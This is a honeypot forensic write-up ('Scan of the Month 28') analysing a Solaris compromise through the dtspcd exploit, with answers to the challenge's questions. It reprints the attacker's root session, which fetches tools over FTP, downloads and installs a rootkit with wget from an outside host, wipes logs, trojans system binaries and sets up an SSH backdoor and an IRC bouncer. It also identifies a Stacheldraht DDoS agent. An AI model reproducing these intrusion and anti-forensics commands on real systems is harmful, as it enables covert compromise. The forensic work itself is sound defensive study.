Scan of the Month 28

Ingo Wenda


Table of content

Analysis
Questions and Answers
dlp script
ipv6sun script

Analysis

General

Analysis was done on a SuSE 8.0 Linux machine.



Used tools

Tool

Version

Description

md5sum

2.0.10

Calculates the MD5 fingerprint of a file. Used to verify the downloaded files.

ethereal

0.9.6

A network traffic analyser with a GUI

tcpflow

0.20

A tool that reassembles the data transmitted in a TCP/IP session

snort

1.8.4

An intrusion detection system

tcpdump

3.6

A network packet capture tool

strings

2.11.92.0.10

Finds and displays ASCII strings in binary files

file

3.37

Determines the type of a file



Download and verification of the log files

First I downloaded the two log files day1.log and day3.log and verified the md5 signature using the md5sum tool.



Analysing the attack

First I used snort on day1.log to find out how the honeypot was compromised. After a few alerts, indicating some scans for a proxy server, snort displays this alert, indicating a dtspcd exploit:



[**] [1:620:1] SCAN Proxy attempt [**]
[Classification: Attempted Information Leak] [Priority: 2]
11/29-14:25:08.481119 61.144.145.243:3667 -> 192.168.100.28:8080
TCP TTL:47 TOS:0x0 ID:19890 IpLen:20 DgmLen:52 DF
******S* Seq: 0x15E082B1  Ack: 0x0  Win: 0xE640  TcpLen: 32
TCP Options (6) => MSS: 1452 NOP WS: 2 NOP NOP SackOK

[**] [1:618:1] INFO - Possible Squid Scan [**]
[Classification: Attempted Information Leak] [Priority: 2]
11/29-14:25:08.481119 61.144.145.243:3677 -> 192.168.100.28:3128
TCP TTL:47 TOS:0x0 ID:19892 IpLen:20 DgmLen:52 DF
******S* Seq: 0x15E1F6DD  Ack: 0x0  Win: 0xE640  TcpLen: 32
TCP Options (6) => MSS: 1452 NOP WS: 2 NOP NOP SackOK

[ ... repeating messages removed ... ]

[**] [1:1398:4] EXPLOIT CDE dtspcd exploit attempt [**]
[Classification: Misc Attack] [Priority: 2]
11/29-17:36:26.503382 61.219.90.180:56711 -> 192.168.100.28:6112
TCP TTL:44 TOS:0x0 ID:61373 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x7FC1DB88  Ack: 0xBA41EB06  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 48510034 113867474
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0803]
[Xref => http://www.cert.org/advisories/CA-2002-01.html]

[ ... rest of the output removed ... ]



Because the dtspcd exploit is discussed in detail in the Scan of the month challenge 20, I will not further describe it here. The result of a successful exploit is an interactive root-shell bound to the ingreslock port. So the next step in the analysis was to locate a communication to our honeypot on the ingreslock port after the exploit. I reconstructed this root session, originating from 61.219.90.180, using the 'Follow TCP stream' option of ethereal:

# uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 1773
# wget
wget: not found
# w
  9:44am  up 13 day(s),  4:24,  0 users,  load average: 0.00, 0.00, 0.01
User     tty           login@  idle   JCPU   PCPU  what
# /bin/sh -i
unset HISTFILE
# unset DISPLAY
mkdir /usr/share/man/man1/.old
cd /usr/share/man/man1/.old
# # # ftp 62.211.66.16 21
bobzz
ftp: ioctl(TIOCGETP): Invalid argument
Password:joka

get wget
get dlp
get solbnc
get iupv6sun
Name (62.211.66.16:root): iupv6sun: No such file or directory.
get ipv6sun
quit
# ls
dlp
ipv6sun
solbnc
wget
# chmod +x solbnc wget dlp
# ./wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
# ./wget http://62.211.66.53/bobzz/sol.tar.gz
--09:47:58--  http://62.211.66.53:80/bobzz/sol.tar.gz
           => `sol.tar.gz'
Connecting to 62.211.66.53:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,884,160 [application/x-tar]


    0K -> .......... .......... .......... .......... .......... [  2%]
   50K -> .......... .......... .......... .......... .......... [  5%]
  100K -> .......... .......... .......... .......... .......... [  8%]
  150K -> .......... .......... .......... .......... .......... [ 10%]
  200K -> .......... .......... .......... .......... .......... [ 13%]
  250K -> .......... .......... .......... .......... .......... [ 16%]
  300K -> .......... .......... .......... .......... .......... [ 19%]
  350K -> .......... .......... .......... .......... .......... [ 21%]
  400K -> .......... .......... .......... .......... .......... [ 24%]
  450K -> .......... .......... .......... .......... .......... [ 27%]
  500K -> .......... .......... .......... .......... .......... [ 29%]
  550K -> .......... .......... .......... .......... .......... [ 32%]
  600K -> .......... .......... .......... .......... .......... [ 35%]
  650K -> .......... .......... .......... .......... .......... [ 38%]
  700K -> .......... .......... .......... .......... .......... [ 40%]
  750K -> .......... .......... .......... .......... .......... [ 43%]
  800K -> .......... .......... .......... .......... .......... [ 46%]
  850K -> .......... .......... .......... .......... .......... [ 48%]
  900K -> .......... .......... .......... .......... .......... [ 51%]
  950K -> .......... .......... .......... .......... .......... [ 54%]
 1000K -> .......... .......... .......... .......... .......... [ 57%]
 1050K -> .......... .......... .......... .......... .......... [ 59%]
 1100K -> .......... .......... .......... .......... .......... [ 62%]
 1150K -> .......... .......... .......... .......... .......... [ 65%]
 1200K -> .......... .......... .......... .......... .......... [ 67%]
 1250K -> .......... .......... .......... .......... .......... [ 70%]
 1300K -> .......... .......... .......... .......... .......... [ 73%]
 1350K -> .......... .......... .......... .......... .......... [ 76%]
 1400K -> .......... .......... .......... .......... .......... [ 78%]
 1450K -> .......... .......... .......... .......... .......... [ 81%]
 1500K -> .......... .......... .......... .......... .......... [ 84%]
 1550K -> .......... .......... .......... .......... .......... [ 86%]
 1600K -> .......... .......... .......... .......... .......... [ 89%]
 1650K -> .......... .......... .......... .......... .......... [ 92%]
 1700K -> .......... .......... .......... .......... .......... [ 95%]
 1750K -> .......... .......... .......... .......... .......... [ 97%]
 1800K -> .......... .......... .......... ..........            [100%]

09:55:09 (4.27 KB/s) - `sol.tar.gz' saved [1884160/1884160]

# rrrrrretar -xf sol.tar.gz
rrrrrretar: not found
# cd sol
sol: does not exist
# ./setup
./setup: not found
# cd sol
sol: does not exist
# tar -xf sol.tar.gz
# cd sol
# ./setup
[0;36mbobz oN ircNet on join #privè 
     /\                                                /\
  _/  \    ___|   Autor: bobz    |___    /  \_
       \  /                                       \  /
        \/                                         \/


   ********
   ********            **     **      **
   **                  **    **      *  *
   ******* **********  **   **      *    *
   ******* **      **  ******      ********
        ** **      **  ******     **********
   ******* **      **  **   **    **      **
   ******* **      **  **    **   **      **
           **********  **     **  **      **
     /\                                              /\
  _/  \    ___| Autor: bobz    |___    /  \_
       \  /                                     \  /
        \/                                       \/

       ...:::[ Autore bobz ]:::...
  ...:::[ On IRcnEt On Join #bobz ]:::...

Ti:AmO:RosariADelete Logz...
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by warning
[1;37m*[0;37m Starting up at: [0;36m1038585350[0;37m
[1;37m*[0;37m Installing from /usr/share/man/man1/.old/sol - Will erase /usr/share/man/man1/.old/sol after install
[1;37m*[0;37m Checking for existing rootkits..
#[1;37m*#[0;37m Checking for existing rootkits..
#[1;37m*#[0;37m checking /etc/rc2 and /etc/rc3 for rootkits...
#[1;37m*#[0;37m Rootkits Removed from config files
#[1;37m*#[0;37m checking crond configs for rootkits...
#[1;37m*#[0;37m Rootkits Removed from crond config files
#[1;31m*** WARNING ***#[0;37m 2 suspicious files found in /dev
[1;37m***[0;37m Insert Rootkit Password : 
mixer
[1;37m***[0;37m Using Password mixer
[1;37m***[0;37m Insert Rootkit SSH Port : 
5001
[1;37m***[0;37m Using Port 5001
[1;37m***[0;37m Insert Rootkit PsyBNC Port : 
7000
[1;37m***[0;37m Using Port 7000
File processed...
[1;37m*[0;37m Making backups... su ping du passwd find ls netstat strings ps Done.
[1;37m*[0;37m Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
[1;37m*[0;37m Suid removal at atq atrm eject fdformat rdist rdist admintool ufsdump ufsrestore quota ff.core lpset lpstat netpr arp chkperm Complete.
[1;37m*[0;37m Starting Patcher...
* Patching...
 DTSCD PATCHED
 LPD PATCHED
 fingerd
 cmsd
 ttdbserverd
 sadmind
 statd
 rquotad
 rusersd
 cachefsd
 bindshells
 snmpXdmid
 Done.


--09:56:21--  ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
           => `111085-02.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done.  ==> CWD pub/patches ... done.
==> PORT ... done.    ==> RETR 111085-02.zip ... done.
Length: 27,300 (unauthoritative)

    0K -> .......... .......... ......                           [100%]

09:56:45 (1.83 KB/s) - `111085-02.zip' saved [27300]

Archive:  111085-02.zip
   creating: 111085-02/
  inflating: 111085-02/.diPatch      
   creating: 111085-02/SUNWcsu/
  inflating: 111085-02/SUNWcsu/pkgmap  
  inflating: 111085-02/SUNWcsu/pkginfo  
   creating: 111085-02/SUNWcsu/install/
  inflating: 111085-02/SUNWcsu/install/checkinstall  
  inflating: 111085-02/SUNWcsu/install/copyright  
  inflating: 111085-02/SUNWcsu/install/i.none  
  inflating: 111085-02/SUNWcsu/install/patch_checkinstall  
  inflating: 111085-02/SUNWcsu/install/patch_postinstall  
  inflating: 111085-02/SUNWcsu/install/postinstall  
  inflating: 111085-02/SUNWcsu/install/preinstall  
   creating: 111085-02/SUNWcsu/reloc/
   creating: 111085-02/SUNWcsu/reloc/usr/
   creating: 111085-02/SUNWcsu/reloc/usr/bin/
  inflating: 111085-02/SUNWcsu/reloc/usr/bin/login  
  inflating: 111085-02/README.111085-02  
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed.  This installation
will attempt to overwrite this package.

PaTcH_MsG 2 Patch number 111085-02 is already applied.

Installation of <SUNWcsu> was suspended (administration).
No changes were made to the system.
--09:56:49--  ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip
           => `108949-07.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done.  ==> CWD pub/patches ... done.
==> PORT ... done.    ==> RETR 108949-07.zip ... done.
Length: 1,033,092 (unauthoritative)

    0K -> .......... .......... .......... .......... .......... [  4%]
   50K -> .......... .......... .......... .......... .......... [  9%]
  100K -> .......... .......... .......... .......... .......... [ 14%]
  150K -> .......... .......... .......... .......... .......... [ 19%]
  200K -> .......... .......... .......... .......... .......... [ 24%]
  250K -> .......... .......... .......... .......... .......... [ 29%]
  300K -> .......... .......... .......... .......... .......... [ 34%]
  350K -> .......... .......... .......... .......... .......... [ 39%]
  400K -> .......... .......... .......... .......... .......... [ 44%]
  450K -> .......... .......... .......... .......... .......... [ 49%]
  500K -> .......... .......... .......... .......... .......... [ 54%]
  550K -> .......... .......... .......... .......... .......... [ 59%]
  600K -> .......... .......... .......... .......... .......... [ 64%]
  650K -> .......... .......... .......... .......... .......... [ 69%]
  700K -> .......... .......... .......... .......... .......... [ 74%]
  750K -> .......... .......... .......... .......... .......... [ 79%]
  800K -> .......... .......... .......... .......... .......... [ 84%]
  850K -> .......... .......... .......... .......... .......... [ 89%]
  900K -> .......... .......... .......... .......... .......... [ 94%]
  950K -> .......... .......... .......... .......... .......... [ 99%]
 1000K -> ........                                               [100%]

10:01:00 (4.20 KB/s) - `108949-07.zip' saved [1033092]

Archive:  108949-07.zip
   creating: 108949-07/
  inflating: 108949-07/.diPatch      
  inflating: 108949-07/postbackout   
   creating: 108949-07/SUNWdtbas/
  inflating: 108949-07/SUNWdtbas/pkgmap  
  inflating: 108949-07/SUNWdtbas/pkginfo  
   creating: 108949-07/SUNWdtbas/install/
  inflating: 108949-07/SUNWdtbas/install/checkinstall  
  inflating: 108949-07/SUNWdtbas/install/copyright  
  inflating: 108949-07/SUNWdtbas/install/depend  
  inflating: 108949-07/SUNWdtbas/install/i.none  
  inflating: 108949-07/SUNWdtbas/install/patch_checkinstall  
  inflating: 108949-07/SUNWdtbas/install/patch_postinstall  
  inflating: 108949-07/SUNWdtbas/install/postinstall  
  inflating: 108949-07/SUNWdtbas/install/preinstall  
   creating: 108949-07/SUNWdtbas/reloc/
   creating: 108949-07/SUNWdtbas/reloc/dt/
   creating: 108949-07/SUNWdtbas/reloc/dt/lib/
  inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtHelp.so.1  
  inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtSvc.so.1  
   creating: 108949-07/SUNWdtbax/
  inflating: 108949-07/SUNWdtbax/pkgmap  
  inflating: 108949-07/SUNWdtbax/pkginfo  
   creating: 108949-07/SUNWdtbax/install/
  inflating: 108949-07/SUNWdtbax/install/checkinstall  
  inflating: 108949-07/SUNWdtbax/install/copyright  
  inflating: 108949-07/SUNWdtbax/install/depend  
  inflating: 108949-07/SUNWdtbax/install/i.none  
  inflating: 108949-07/SUNWdtbax/install/patch_checkinstall  
  inflating: 108949-07/SUNWdtbax/install/patch_postinstall  
  inflating: 108949-07/SUNWdtbax/install/postinstall  
  inflating: 108949-07/SUNWdtbax/install/preinstall  
   creating: 108949-07/SUNWdtbax/reloc/
   creating: 108949-07/SUNWdtbax/reloc/dt/
   creating: 108949-07/SUNWdtbax/reloc/dt/lib/
   creating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/
  inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtHelp.so.1  
  inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtSvc.so.1  
  inflating: 108949-07/postpatch     
  inflating: 108949-07/README.108949-07  
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed.  This installation
will attempt to overwrite this package.


Installation of <SUNWdtbas> was successful.
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed.  This installation
will attempt to overwrite this package.



Installation of <SUNWdtbax> was successful.
Archive:  111606-02.zip
   creating: 111606-02/
  inflating: 111606-02/.diPatch      
   creating: 111606-02/SUNWftpu/
  inflating: 111606-02/SUNWftpu/pkgmap  
  inflating: 111606-02/SUNWftpu/pkginfo  
   creating: 111606-02/SUNWftpu/install/
  inflating: 111606-02/SUNWftpu/install/checkinstall  
  inflating: 111606-02/SUNWftpu/install/copyright  
  inflating: 111606-02/SUNWftpu/install/i.none  
  inflating: 111606-02/SUNWftpu/install/patch_checkinstall  
  inflating: 111606-02/SUNWftpu/install/patch_postinstall  
  inflating: 111606-02/SUNWftpu/install/postinstall  
  inflating: 111606-02/SUNWftpu/install/preinstall  
   creating: 111606-02/SUNWftpu/reloc/
   creating: 111606-02/SUNWftpu/reloc/usr/
   creating: 111606-02/SUNWftpu/reloc/usr/sbin/
  inflating: 111606-02/SUNWftpu/reloc/usr/sbin/in.ftpd  
  inflating: 111606-02/README.111606-02  
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed.  This installation
will attempt to overwrite this package.


Installation of <SUNWftpu> was successful.
PS Trojaned[1;37m*[0;37m Primary network interface is of type: [0;36mhme[0;37m
[1;37m*[0;37m Copying utils.. passgen fixer wipe utime crt idstart ssh-dxe syn README  Done.
[1;37m*[0;37m psyBNC has now been configured on port 7000 (default) with no IDENT
[1;37m*[0;37m erasing rootkit...
./setup: test: unknown operator 16
# ./startbnc
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
 ,----.,----.,-.  ,-.,---.,--. ,-.,----. 
 |  O ||  ,-' \ \/ / | o ||   \| || ,--' 
 |  _/ _\  \   \  /  | o< | |\   || |__  
 |_|  |____/   |__|  |___||_|  \_| \___| 
      Version 2.2.1 (c) 1999-2000
              the most psychoid          
      and  the cool lam3rz Group IRCnet  
                                         
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
^[[1;37m*^[[0;37m psyBNC installed - loaded on reboot :>
# cd ..
# ./solbnc
# ./dlp
Delete LogZ by bobbino
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by bobbino
    root   167     1  0   Nov 16 ?        0:00 /usr/sbin/inetd -s
    root  3325  3265  0 10:02:25 ?        0:00 grep inetd
---
Patch.....
Attivata by RyO
# # 



Our friend starts exploring the machine, who's logged on , etc., with the usual commands, as seen in many other exploits. In the output following the uname -a command, we find the answer to one of our questions: The honeypot is running SunOS 5.8. Next he creates the directory /usr/share/man/man1/.old, where he hides his downloads later. Next he starts downloading four files from 62.211.66.16: wget, dlp, solbnc and ipv6sun. Wget is the standard wget download tool, which he uses to retrieve a fifth file from 62.211.66.53: sol.tar.gz. Next he extracts and installs sol.tar.gz, which is a rootkit. It cleans the log files and removes other traces of the attack, then checks for other rootkits on the machine, installs a SSH backdoor on port 5001 and the psyBNC IRC bouncer listening on port 7000 (an IRC bouncer is a proxy for IRC connections and is mainly used to hide the identity of your real origin host and to keep nicks and channel op rights, see http://www.netknowledgebase.com/tutorials/psybnc.html for an explanation of psyBNC). After that, the rootkit starts trojaning a number of system tools, so they will not display the hacker activity anymore. Next it patches our honeypot, so no other hacker can root it, it even downloads some patches from the sun-server sunsolve.sun.com. Finally the attacker starts the psyBNC proxy and executes two further commands: solbnc and dlp. dlp is a small cleanup script, which again wipes various log files and traces. What solbnc is, I had no answer at this moment, except, that it is a SPARC ELF binary (I extracted the binary using tcpflow and tested it with file). But we will come back to this later in the analysis.

Inspecting the communication following the root-session in ethereal, I found the attacker contacting the psyBNC proxy from 80.117.14.44 (host44-14.pool80117.interbusiness.it) and connecting the proxy to irc.stealth.net.

ICMP Packets containing the string 'skillz'

I started my analysis on this with a google search for the expression 'ICMP packets skillz'. This leads to a number of results, I explored further the page of SANS: http://www.sans.org/resources/idfaq/stacheldraht.php . It contains an analysis of the 'stacheldraht' DDoS attack tool. A stacheldraht agent tries to contact his master (also called handler), by sending him those ICMP echo replies with an ID of 666 and the string 'skillz'. The master will reply with an ICMP echo reply with the ID 667 and the string 'ficken'. On day one our honeypot starts sending his 'skillz' packets to two hosts: 217.116.38.10 and 61.134.3.11, but receives no replies. On day three replies from 61.134.3.11 are logged. Remark: Our agent seems to be a little bit modified, because the used IDs are 6666 and 6667 instead of 666 and 667. Next I tried to figure out, where our stacheldraht agent came from. First I searched, at which time our machine started sending its packets: The first packet was logged immediately after the TCP packet in the above root session, carrying the ./solbnc command. So I analysed the solbnc binary, which I extracted using the 'Follow TCP stream' feature of ethereal, with strings. It contains the typical strings 'skillz' and 'ficken', so it's pretty sure, that solbnc is the stacheldraht agent.



The unusual protocol

I inspected the day3 log with ethereal. The first occurence of an IPv6 packet was on 01:11:03.8640. I discovered, that about one minute earlier the system went through a reboot (The kernel messages to the remote syslog server can be found in the log starting at 01:10:02.8581). When going to reboot there was an open connection to the SSH backdoor on port 5001 from 61.101.108.86. This connection is reestablished as soon as the machine is back online (you find some pings from the attackers machine, probing the honeypot before reconnecting). I assume that the attacker installed the IPv6 through IPv4 tunneling interface before rebooting, using the ipv6sun script he downloaded during his initial attack.

About 2 minutes later, at 01:13:03.3559 the attacker connects via IPv6 to the italian IRC server irc6.edisontel.it.

The nationality of the attacker

By inspecting the IRC sessions with ethereal, I recognized, that most of the communication is in italian language. In the two shellscripts dlp and ipv6sun he uses and in the installation of the rootkit, the output strings are also in italian language. Together with the fact, that our psyBNC is contacted from a host on an italian networkprovider, and our attacker connects finally to an italian IRC server, i assume, that the attacker is from Italy.




Questions and Answers

Q1: What is the operating system of the honeypot? How did you determine that? (see day1)

A1: I determined the operating system by decoding the root-shell session after the dtspcd attack. The first command, that the attacker issues is a uname -a, which prints system information. It tells us, that the machine is running SunOS 5.8. Because SunOS 5.8 is part of SOLARIS 8, the answer is: The honeypot is running SOLARIS 8.



Q2: How did the attacker(s) break into the system? (see day1)

A2: The attacker broke into the system by mounting a successful dtspcd attack, like the one, which was deeply analysed in the Scan of the month 20.



Q3: Which systems were used in this attack, and how? (see day1)

A3:

System

Role in the attack

61.219.90.180

Launches the dtspcd exploit, opens the root-session to the ingreslock port

62.211.66.16

From this system, the files wget, dlp, solbnc and ipv6sun are downloaded

62.211.66.53

From this system the rootkit sol.tar.gz is downloaded

sunsolve.sun.com

From this official sun-site two patches are downloade

217.116.38.10 and 61.134.3.11

The stacheldraht agent tries to connect to these two systems (but gets no answer on day one, on day3 61.134.3.11 starts responding)

80.117.14.44

From this machine the attacker connects to the psyBNC proxy

irc.stealth.net

The attacker connects the psyBNC proxy to this IRC server after installation





Q4: Create a diagram that demonstrates the sequences involved in the attack. (see day1)

A4:






Q5: What is the purpose/reason of the ICMP packets with 'skillz' in them? (see day1)

A5: Those ICMP echo replies are send from a 'Stacheldraht' agent to contact his handler. The handler will respond with ICMP echo replies containing 'ficken'.



Q6: Following the attack, the attacker(s) enabled a unique protocol that one would not expect to find on an IPv4 network. Can you identify that protocol and why it was used? (see day3)

A6: The protocol used is IPv6 through IPv4 tunneling. The attacker establishes his IRC connections over this protocol on the end of day3. Propably he uses this protocol, because some IDS systems are not able to decode this protocol, so that he can slip by those systems, undetected.



Q7: Can you identify the nationality of the attacker? (see day3)

A7: The attacker is propably from Italy.


Bonus Questions

BQ1: What are the implications of using the unusual IP protocol to the Intrusion Detection industry?

BA1: As stated in A6, some IDSes may not be able to detect traffic coming in and out over IPv6. As increasingly more systems are equiped with an IPv6 stack, a quick reaction of the IDS industry is required to close this problem, or networks can't start using IPv6 safely, without drilling a big hole into security.



BQ2: What tools exist that can decode this protocol?

BA2: I used ethereal to decode this IPv6 traffic. Tcpdump should also be able to decode IPv6 traffic.